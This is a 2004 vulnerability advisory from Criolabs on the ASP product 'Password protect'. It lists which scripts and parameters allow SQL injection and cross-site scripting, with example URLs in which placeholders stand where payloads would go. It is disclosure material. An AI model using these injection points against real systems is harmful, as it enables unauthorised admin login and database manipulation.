Password Protect XSS and SQL-Injection vulnerabilities.
****************************************************************************************************
CRIOLABS
- Software: Password protect
- Type: User Authentication
- Company: Web Animations
- Date: 30-8-2004
****************************************************************************************************
## Software ##
Software: Password protect
Versions: All
Languaje: ASP
Plataforms: Win nt, 2000, xp
Web: http://www.webanimations.com.au/
The ultimate protection including unlimited user names and passwords each
checking their individual
ip address. You can add 1 ip address or include a range for the users with
various IP address's
when they log in.
## Affected part ##
- ChangePassword.asp (XSS in ShowMsg, SQL Injection in LoginId and OPass
variables)
- index.asp (XSS in ShowMsg)
- index_next.asp (SQL Injection in admin and Pass variables)
- users_list.asp (XSS in ShowMsg variable)
- users_add.asp (XSS in ShowMsg variable, SQL Injection)
- users_edit.asp (XSS, SQL Injection)
## Vulnerabilities ##
### SQL Injection ###
A remote user can use an sql-injection attack to login as admin or
manipulate the database.
index_next.asp, ChangePassword.asp, users_edit.asp, users_add.asp are
affected.
Example:
/adminSection/index_next.asp?
admin = (SQLInjection) Pass = (SQLInjection)
/adminSection/ChangePassword.asp?
LoginId=(SQLInjection) OPass=(SQLInjection) NPass=(SQLInjection)
CPass=(SQLInjection)
### Cross-site Scripting ###
This software do not filter HTML code from user-supplied input in some
scripts.
Example:
/adminSection/index.asp?ShowMsg=(XSS)
/adminSection/ChangePassword.asp?ShowMsg=(XSS)
/adminSection/users_list.asp?ShowMsg=(XSS)
/adminSection/users_add.asp?ShowMsg=(XSS)
## History ##
Vendor contacted: Fri, 06 Aug 2004, no response.
## Credits ##
Criolabs staff
http://www.criolabs.net
Original advisory and proof of concept in
http://www.criolabs.net/advisories/passprotect.txt